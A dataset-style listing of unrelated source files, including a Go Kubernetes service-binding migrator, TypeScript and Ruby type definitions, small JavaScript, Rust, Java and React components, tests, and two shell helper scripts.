			if binding.ID == svcat.Spec.ExternalID {
				smBinding = &smBindings.ServiceBindings[i]
				break
			}
		}
		if smBinding == nil {
			// NOTE(review): this log prints svcat.Name twice — one of the
			// placeholders was presumably meant to be the namespace; confirm.
			m.ac.Logger.Infof("svcat binding name '%s' id '%s' (%s) not found in SM, skipping it...", svcat.Name, svcat.Spec.ExternalID, svcat.Name)
			continue
		}
		// Copy the loop variable so each pair holds a stable pointer.
		svcBinding := svcat
		validBindings = append(validBindings, serviceBindingPair{
			svcatBinding: &svcBinding,
			smBinding:    smBinding,
		})
	}
	return validBindings
}
// migrateInstance migrates one svcat service instance to the BTP operator:
// it first tags the instance in Service Manager with its k8s name, then
// creates the corresponding v1alpha1.ServiceInstance in the cluster.
// Resources already created by a previous run (carrying the "migrated" label)
// are tolerated via ignoreAlreadyMigrated.
func (m *migrator) migrateInstance(pair serviceInstancePair) error {
	m.ac.Logger.Infof("migrating service instance '%s' in namespace '%s' (smID: '%s')", pair.svcatInstance.Name, pair.svcatInstance.Namespace, pair.svcatInstance.Spec.ExternalID)
	// Set the k8s name label on the SM instance via the migrate endpoint.
	requestBody := fmt.Sprintf(`{"k8sname": "%s"}`, pair.svcatInstance.Name)
	buffer := bytes.NewBuffer([]byte(requestBody))
	// NOTE(review): the response body is never drained/closed here — confirm
	// sm.Client.Call takes care of that.
	response, err := m.SMClient.Call(http.MethodPut, fmt.Sprintf("/v1/migrate/service_instances/%s", pair.smInstance.ID), buffer, &sm.Parameters{})
	if err != nil || response.StatusCode != http.StatusOK {
		if response != nil {
			m.ac.Logger.Errorf("received statusCode %v", response.StatusCode)
		}
		return fmt.Errorf("failed to add k8s label to service instance name: %s, ID: %s", pair.smInstance.Name, pair.smInstance.ID)
	}
	// Create the operator-side ServiceInstance mirroring the svcat one.
	instance := m.getInstanceStruct(pair)
	res := &v1alpha1.ServiceInstance{}
	err = m.SapOperatorRestClient.Post().
		Namespace(pair.svcatInstance.Namespace).
		Resource(serviceInstances).
		Body(instance).
		Do(m.ac.Context).
		Into(res)
	if err = m.ignoreAlreadyMigrated(instance, res, err); err != nil {
		return fmt.Errorf("failed to create service instance: %v", err.Error())
	}
	m.ac.Logger.Infof("instance migrated successfully")
	return nil
}
// migrateBinding migrates one svcat service binding to the BTP operator:
// 1. look up the binding's credentials secret (a missing secret is tolerated);
// 2. tag the SM binding with its k8s name and push the credentials;
// 3. label the secret with the binding name;
// 4. create the operator-side ServiceBinding;
// 5. make the new binding the secret's owner so the secret follows its lifecycle.
func (m *migrator) migrateBinding(pair serviceBindingPair) error {
	m.ac.Logger.Infof("migrating service binding '%s' in namespace '%s' (smID: '%s')", pair.svcatBinding.Name, pair.svcatBinding.Namespace, pair.svcatBinding.Spec.ExternalID)
	secretExists := true
	secret, err := m.ClientSet.CoreV1().Secrets(pair.svcatBinding.Namespace).Get(m.ac.Context, pair.svcatBinding.Spec.SecretName, metav1.GetOptions{})
	if err != nil {
		if errors.IsNotFound(err) {
			// A binding without its secret is still migrated, just without
			// credentials or secret ownership updates.
			m.ac.Logger.Infof("Info: secret named '%s' not found for binding", pair.svcatBinding.Spec.SecretName)
			secretExists = false
		} else {
			return fmt.Errorf("failed to get binding's secret, skipping binding migration. Error: %v", err.Error())
		}
	}
	// Add the k8sname label and save the credentials in SM.
	requestBody, err := m.getMigrateBindingRequestBody(pair.svcatBinding.Name, secret)
	if err != nil {
		return fmt.Errorf("failed to build request body for migrating instance. Error: %v", err.Error())
	}
	buffer := bytes.NewBuffer([]byte(requestBody))
	// NOTE(review): the response body is never drained/closed here — confirm
	// sm.Client.Call takes care of that.
	response, err := m.SMClient.Call(http.MethodPut, fmt.Sprintf("/v1/migrate/service_bindings/%s", pair.smBinding.ID), buffer, &sm.Parameters{})
	if err != nil || response.StatusCode != http.StatusOK {
		return fmt.Errorf("failed to add k8s label to service binding name: %s, ID: %s", pair.smBinding.Name, pair.smBinding.ID)
	}
	if secretExists {
		// Add the 'binding' label to the secret.
		if secret.Labels == nil {
			secret.Labels = make(map[string]string, 1)
		}
		secret.Labels["binding"] = pair.svcatBinding.Name
		secret, err = m.ClientSet.CoreV1().Secrets(secret.Namespace).Update(m.ac.Context, secret, metav1.UpdateOptions{})
		if err != nil {
			return fmt.Errorf("failed to add label to binding. Error: %v", err.Error())
		}
	}
	binding := m.getBindingStruct(pair)
	res := &v1alpha1.ServiceBinding{}
	err = m.SapOperatorRestClient.Post().
		Namespace(binding.Namespace).
		Resource(serviceBindings).
		Body(binding).
		Do(m.ac.Context).
		Into(res)
	if err = m.ignoreAlreadyMigrated(binding, res, err); err != nil {
		return fmt.Errorf("failed to create service binding: %v", err.Error())
	}
	if secretExists {
		// Set the new binding as owner reference for the secret so Kubernetes
		// garbage-collects the secret together with the binding.
		t := true
		owner := metav1.OwnerReference{
			APIVersion:         res.APIVersion,
			Kind:               res.Kind,
			Name:               res.Name,
			UID:                res.UID,
			Controller:         &t,
			BlockOwnerDeletion: &t,
		}
		secret.OwnerReferences = []metav1.OwnerReference{owner}
		_, err = m.ClientSet.CoreV1().Secrets(secret.Namespace).Update(m.ac.Context, secret, metav1.UpdateOptions{})
		if err != nil {
			return fmt.Errorf("failed to set new binding as owner of secret. Error: %v", err.Error())
		}
	}
	m.ac.Logger.Infof("binding migrated successfully")
	return nil
}
// getInstanceStruct maps a svcat instance plus its SM counterpart onto the
// v1alpha1.ServiceInstance expected by the BTP operator. Plan and offering
// names are resolved from the pre-fetched ID caches; the original creation
// timestamp and user info are preserved as annotations; the "migrated" label
// marks the resource for ignoreAlreadyMigrated.
func (m *migrator) getInstanceStruct(pair serviceInstancePair) *v1alpha1.ServiceInstance {
	plan := m.Plans[pair.smInstance.ServicePlanID]
	service := m.Services[plan.ServiceOfferingID]
	// Carry over secret-backed parameter references verbatim.
	parametersFrom := make([]v1alpha1.ParametersFromSource, 0)
	for _, param := range pair.svcatInstance.Spec.ParametersFrom {
		parametersFrom = append(parametersFrom, v1alpha1.ParametersFromSource{
			SecretKeyRef: &v1alpha1.SecretKeyReference{
				Name: param.SecretKeyRef.Name,
				Key:  param.SecretKeyRef.Key,
			},
		})
	}
	// UserInfo is only preserved as an annotation; a marshal failure is
	// logged but does not abort the migration.
	userInfo, err := json.Marshal(pair.svcatInstance.Spec.UserInfo)
	if err != nil {
		m.ac.Logger.Infof("failed to parse user info for instance %s: %v", pair.svcatInstance.Name, err.Error())
	}
	return &v1alpha1.ServiceInstance{
		TypeMeta: metav1.TypeMeta{
			APIVersion: fmt.Sprintf("%s/%s", operatorGroupName, operatorGroupVersion),
			Kind:       "ServiceInstance",
		},
		ObjectMeta: metav1.ObjectMeta{
			Name:      pair.svcatInstance.Name,
			Namespace: pair.svcatInstance.Namespace,
			Labels: map[string]string{
				migratedLabel: "true",
			},
			Annotations: map[string]string{
				"original_creation_timestamp": pair.svcatInstance.CreationTimestamp.String(),
				"original_user_info":          string(userInfo)},
		},
		Spec: v1alpha1.ServiceInstanceSpec{
			ServicePlanName:     plan.Name,
			ServiceOfferingName: service.Name,
			ExternalName:        pair.smInstance.Name,
			ParametersFrom:      parametersFrom,
			Parameters:          pair.svcatInstance.Spec.Parameters,
		},
	}
}
// getBindingStruct maps a svcat binding plus its SM counterpart onto the
// v1alpha1.ServiceBinding expected by the BTP operator. The original creation
// timestamp and user info are preserved as annotations; the "migrated" label
// marks the resource for ignoreAlreadyMigrated.
func (m *migrator) getBindingStruct(pair serviceBindingPair) *v1alpha1.ServiceBinding {
	// Carry over secret-backed parameter references verbatim.
	parametersFrom := make([]v1alpha1.ParametersFromSource, 0)
	for _, param := range pair.svcatBinding.Spec.ParametersFrom {
		parametersFrom = append(parametersFrom, v1alpha1.ParametersFromSource{
			SecretKeyRef: &v1alpha1.SecretKeyReference{
				Name: param.SecretKeyRef.Name,
				Key:  param.SecretKeyRef.Key,
			},
		})
	}
	// UserInfo is only preserved as an annotation; a marshal failure is
	// logged but does not abort the migration.
	userInfo, err := json.Marshal(pair.svcatBinding.Spec.UserInfo)
	if err != nil {
		m.ac.Logger.Infof("failed to parse user info for binding %s. Error: %v", pair.svcatBinding.Name, err.Error())
	}
	return &v1alpha1.ServiceBinding{
		TypeMeta: metav1.TypeMeta{
			APIVersion: fmt.Sprintf("%s/%s", operatorGroupName, operatorGroupVersion),
			Kind:       "ServiceBinding",
		},
		ObjectMeta: metav1.ObjectMeta{
			Name:      pair.svcatBinding.Name,
			Namespace: pair.svcatBinding.Namespace,
			Labels: map[string]string{
				migratedLabel: "true",
			},
			Annotations: map[string]string{
				"original_creation_timestamp": pair.svcatBinding.CreationTimestamp.String(),
				"original_user_info":          string(userInfo)},
		},
		Spec: v1alpha1.ServiceBindingSpec{
			ServiceInstanceName: pair.svcatBinding.Spec.InstanceRef.Name,
			ExternalName:        pair.smBinding.Name,
			ParametersFrom:      parametersFrom,
			Parameters:          pair.svcatBinding.Spec.Parameters,
		},
	}
}
// ignoreAlreadyMigrated downgrades an AlreadyExists error to success when the
// pre-existing resource carries the "migrated" label (i.e. it was created by a
// previous migration run), refreshing `res` with the live object in that case.
// Any other error — or an existing resource without the label — is returned.
func (m *migrator) ignoreAlreadyMigrated(obj, res object, err error) error {
	if err == nil {
		return nil
	}
	if !errors.IsAlreadyExists(err) {
		return err
	}
	// Derive the REST resource name from the kind (e.g. ServiceInstance ->
	// serviceinstances) and fetch the existing object.
	kind := obj.GetObjectKind().GroupVersionKind().Kind
	resource := fmt.Sprintf("%vs", strings.ToLower(kind))
	if err := m.SapOperatorRestClient.Get().Namespace(obj.GetNamespace()).Resource(resource).Name(obj.GetName()).Do(m.ac.Context).Into(res); err != nil {
		return err
	}
	if res.GetLabels()[migratedLabel] != "true" {
		return fmt.Errorf("resource already exists and is missing label %v", migratedLabel)
	}
	return nil
}
// getMigrateBindingRequestBody builds the JSON payload for SM's
// /v1/migrate/service_bindings/{id} endpoint: the binding's k8s name plus the
// binding credentials taken from its secret (values sent as raw strings).
// A nil secret yields an empty credentials object.
func (m *migrator) getMigrateBindingRequestBody(k8sName string, secret *corev1.Secret) (string, error) {
	var err error
	// BUGFIX: default to an empty JSON object. The previous default of
	// []byte("") produced invalid JSON (`"credentials": `) when secret was nil.
	secretData := []byte("{}")
	secretDataEncoded := make(map[string]string)
	if secret != nil {
		for k, v := range secret.Data {
			secretDataEncoded[k] = string(v)
		}
		secretData, err = json.Marshal(secretDataEncoded)
		if err != nil {
			return "", err
		}
	}
	return fmt.Sprintf(`
{
	"k8sname": "%s",
	"credentials": %s
}`, k8sName, secretData), nil
}
|
// NOTE(review): this augments/overrides the 'http' module name with
// app-specific fetch-style types — confirm shadowing Node's 'http' is intended.
declare module 'http' {
    /** Shape of an HTTP error surfaced to callers. */
    export interface Error {
        message: string;
        status: number;
    }

    /** Default fetch options shared by all requests. */
    export interface DefaultsHeader {
        mode: RequestMode;
        cache: RequestCache;
        credentials: RequestCredentials;
        headers: HeadersInit;
        redirect: RequestRedirect;
        // NOTE(review): `RequestReferrer` is not a standard lib.dom type (the
        // fetch referrer option is a plain string) — confirm it is declared elsewhere.
        referrer: RequestReferrer;
    }

    /** Parameters accepted by the request helper. */
    export interface ParamsProps {
        url: string;
        body?: string;
        headers?: HeadersInit;
        method: string;
    }

    // NOTE(review): name is misspelled ("Reqeust" -> "Request"); kept as-is
    // because consumers import this exact identifier.
    export interface ReqeustParameter extends DefaultsHeader {
        method: string;
        body?: string;
        signal: AbortSignal;
    }
}
|
<reponame>jtrussell/candidate-elimination
// Verifies the UNI_MIN constant exposed by the 'uni.min.constant' Angular module.
describe('Constant: uni.UNI_MIN', function() {
    'use strict';

    var min;

    // Load the module and capture the injected constant before each spec.
    beforeEach(module('uni.min.constant'));
    beforeEach(inject(function(UNI_MIN) {
        min = UNI_MIN;
    }));

    it('should be a number', function() {
        expect(min).toEqual(jasmine.any(Number));
    });
});
|
<gh_stars>0
/**
* @param preferences - an array of integers. Indices of people, whom they love
* @returns number of love triangles
*/
module.exports = function getLoveTrianglesCount(preferences = []) {
let count=0;
preferences.forEach((item,i,arr)=>{
if(arr.indexOf(arr[arr[arr[item-1]-1]-1]) === i)
{count++};
});
return Math.floor(count/3);
};
|
/// Splits `input` into user-perceived characters (extended grapheme clusters)
/// and "encodes" them into a '0'/'1' string.
///
/// NOTE(review): despite the name, `fano_encode` does not implement real
/// Shannon–Fano coding — it emits '0'/'1' purely by grapheme position parity
/// (a demo stub, as the inner comment states), so the output length equals
/// the grapheme count.
/// NOTE(review): `.graphemes(true)` requires the `UnicodeSegmentation` trait
/// from the `unicode-segmentation` crate to be in scope — confirm the `use`
/// exists elsewhere in this file.
fn transform_and_encode(input: &str) -> String {
    // Split the text into extended grapheme clusters, one owned String each.
    fn split_into_graphemes(text: &str) -> Vec<String> {
        text.graphemes(true).map(|g| g.to_string()).collect()
    }
    // Apply grapheme-based transformation.
    let graphemes = split_into_graphemes(input);
    // Placeholder "Fano" encoding: alternate '0'/'1' by grapheme index.
    fn fano_encode(graphemes: &[String]) -> String {
        // For demonstration purposes, a simple parity encoding is used.
        let encoded: String = graphemes
            .iter()
            .enumerate()
            .map(|(i, _)| if i % 2 == 0 { '0' } else { '1' })
            .collect();
        encoded
    }
    // Encode the transformed graphemes using the placeholder encoding.
    fano_encode(&graphemes)
}
package bridge
import (
"fmt"
"testing"
)
// Test is the entry point for the bridge-pattern example tests.
func Test(t *testing.T) {
	t.Run("start: ", NewShapeCircleTest)
}
// NewShapeCircleTest draws circles through both color implementors to
// exercise the bridge between the shape abstraction and its color backends.
// NOTE(review): a nil result only prints to stdout — consider t.Error so the
// test actually fails in that case.
func NewShapeCircleTest(t *testing.T) {
	redCircle := NewShapeCircle(5, 6, 8, NewRedCircle())
	if redCircle != nil {
		redCircle.Draw()
	} else {
		fmt.Println("red circle test fail.")
	}

	greenCircle := NewShapeCircle(1, 2, 4, NewGreenCircle())
	if greenCircle != nil {
		greenCircle.Draw()
	} else {
		fmt.Println("green circle test fail.")
	}
}
|
<filename>src/components/onboarding/views/Username.js
import React from 'react'
import PropTypes from 'prop-types'
import Navigation from 'Common/Navigation'
// Onboarding step that collects the user's desired username, with
// previous/next navigation.
// NOTE(review): the `email` prop is declared (and required) but never
// rendered in this view — confirm whether it should be displayed or whether
// the prop can be dropped from the contract.
const Username = ({ previous, next, handleValueChange, email, username }) => (
  <section>
    <h3>
      Username
    </h3>
    <input
      type="text"
      name="username"
      value={username}
      onChange={handleValueChange}
    />
    <Navigation
      previous={previous}
      next={next}
    />
  </section>
)

Username.propTypes = {
  previous: PropTypes.func.isRequired,
  next: PropTypes.func.isRequired,
  handleValueChange: PropTypes.func.isRequired,
  email: PropTypes.string.isRequired,
  username: PropTypes.string.isRequired
}
export default Username
|
module KubeDSL::DSL::V1
class AzureFileVolumeSource < ::KubeDSL::DSLObject
value_field :read_only
value_field :secret_name
value_field :share_name
validates :read_only, field: { format: :boolean }, presence: false
validates :secret_name, field: { format: :string }, presence: false
validates :share_name, field: { format: :string }, presence: false
def serialize
{}.tap do |result|
result[:readOnly] = read_only
result[:secretName] = secret_name
result[:shareName] = share_name
end
end
def kind_sym
:azure_file_volume_source
end
end
end
|
<reponame>mdominick300/Nutrition_Journal<filename>routes/food-api-routes.js
var db = require('../models');
// CRUD routes for Food entries, backed by Sequelize models.
module.exports = function (app) {
  // List foods, scoped to the authenticated user when present.
  // NOTE(review): `req.user.id` throws if no user is attached to the request —
  // confirm an auth middleware always runs before this route.
  app.get('/api/foods', function (req, res) {
    var query = {};
    if (req.user.id) {
      query.UserId = req.user.id;
    }
    db.Food.findAll({
      where: query,
    }).then(function (dbFood) {
      res.json(dbFood);
    });
  });

  // Create a food entry from the request body and echo it back.
  app.post('/api/foods', function (req, res) {
    db.Food.create(req.body).then(function (dbFood) {
      res.json(dbFood);
    });
  });

  // Delete the food entry with the given id; responds with the delete count.
  app.delete('/api/foods/:id', function (req, res) {
    db.Food.destroy({
      where: {
        id: req.params.id
      }
    }).then(function (dbFood) {
      res.json(dbFood);
    });
  });

  // Update the food entry identified by req.body.id with the remaining fields.
  app.put('/api/foods', function (req, res) {
    db.Food.update(
      req.body,
      {
        where: {
          id: req.body.id
        }
      }).then(function (dbFood) {
        res.json(dbFood);
      });
  });
};
|
const express = require('express');
const router = express.Router();
const Product = require('../models/Product');
// GET /search?name=... — return products matching `name` plus recommendations.
// NOTE(review): if Product.findByName / getRecommendations are asynchronous
// (most data layers return promises), these results would be unresolved
// promises in the JSON response — confirm they are synchronous.
router.get('/search', (req, res) => {
  const query = req.query.name;
  const products = Product.findByName(query);
  const recommendations = Product.getRecommendations(query);
  res.status(200).json({
    products,
    recommendations
  });
});

module.exports = router;
|
/* $Id$ */
/***************************************************************************
* (C) Copyright 2003-2010 - Stendhal *
***************************************************************************
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
package games.stendhal.client.gui.j2d.entity;
import java.util.HashMap;
import java.util.Map;
//
//
import games.stendhal.client.entity.IEntity;
import games.stendhal.client.sprite.Sprite;
import games.stendhal.client.sprite.SpriteStore;
import marauroa.common.Logger;
/**
 * The 2D view of an animated entity whose sprite is selected by a model
 * state key.
 *
 * @param <T> entity type
 */
abstract class StateEntity2DView<T extends IEntity> extends Entity2DView<T> {
    /** Log4J. */
    private static final Logger logger = Logger
            .getLogger(StateEntity2DView.class);

    /** Sprites keyed by model state. */
    protected Map<Object, Sprite> sprites = new HashMap<Object, Sprite>();

    //
    // StateEntity2DView
    //

    /**
     * Build animations by letting the subclass populate the sprite map.
     *
     * @param entity the entity to build animations for
     */
    private void buildAnimations(T entity) {
        buildSprites(entity, sprites);
    }

    /**
     * Populate named state sprites.
     *
     * @param entity The entity to build sprites for
     * @param map The map to populate.
     */
    protected abstract void buildSprites(T entity, final Map<Object, Sprite> map);

    /**
     * Get a keyed state sprite.
     *
     * @param state The state.
     *
     * @return The appropriate sprite for the given state.
     */
    protected Sprite getSprite(final Object state) {
        return sprites.get(state);
    }

    /**
     * Get the current model state.
     *
     * @param entity
     * @return The model state.
     */
    protected abstract Object getState(T entity);

    /**
     * Resolve the sprite for the entity's current state, falling back to the
     * store's failsafe sprite when no sprite is registered for that state.
     *
     * @param entity
     * @return The appropriate sprite for the current state.
     */
    private Sprite getStateSprite(T entity) {
        // getState() is abstract and may be non-trivial, so call it once.
        final Object currentState = getState(entity);
        // Go through getSprite() (not sprites.get) so subclass overrides apply.
        final Sprite stateSprite = getSprite(currentState);

        if (stateSprite != null) {
            return stateSprite;
        }

        logger.debug("No sprite found for: " + currentState);
        return SpriteStore.get().getFailsafe();
    }

    //
    // Entity2DView
    //

    /**
     * Build the visual representation of this entity. This builds all the
     * animation sprites and sets the default frame.
     */
    @Override
    protected void buildRepresentation(T entity) {
        buildAnimations(entity);
        setSprite(getStateSprite(entity));
    }

    /**
     * Update sprite state of the entity.
     *
     * @param entity
     */
    protected void proceedChangedState(T entity) {
        setSprite(getStateSprite(entity));
    }
}
|
#!/bin/sh
# Prints the UUID of the named provisioning profile.
# The argument should be either "Viewfinder Ad Hoc" or "Viewfinder Distribution".
profile="$1"

# Require an argument: grepping for an empty pattern would match every
# installed profile and print all of their UUIDs.
if [ -z "$profile" ]; then
    echo "usage: $0 <profile-name>" >&2
    exit 1
fi

# grep -l lists each .mobileprovision file whose contents mention the profile
# name; the file's basename (minus the extension) is the profile UUID.
full_path=$(grep -l "$profile" "${HOME}/Library/MobileDevice/Provisioning Profiles/"*.mobileprovision)

# Fail loudly when nothing matched instead of handing basename an empty path.
if [ -z "$full_path" ]; then
    echo "error: no provisioning profile matching '$profile' found" >&2
    exit 1
fi

basename -s .mobileprovision "$full_path"
|
#!/bin/sh
#
# Usage from makefile:
# ELOG = . $(topdir)/build/autoconf/print-failed-commands.sh
# $(ELOG) $(CC) $CFLAGS -o $@ $<
#
# This shell script is used by the build system to print out commands that fail
# to execute properly. It is designed to make the "make -s" command more
# useful.
#
# Note that in the example we are sourcing rather than execing the script.
# Since make already started a shell for us, we might as well use it rather
# than starting a new one.

# Run the command via exec inside a subshell: exec replaces only the
# subshell, so this shell survives to report a failure afterwards.
if ! ( exec "$@" ); then
    echo
    echo "In the directory " $(pwd)
    echo "The following command failed to execute properly:"
    echo "$@"
    # Because this script is sourced, exit terminates the shell make
    # started for the recipe line, which marks the rule as failed.
    exit 1
fi
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.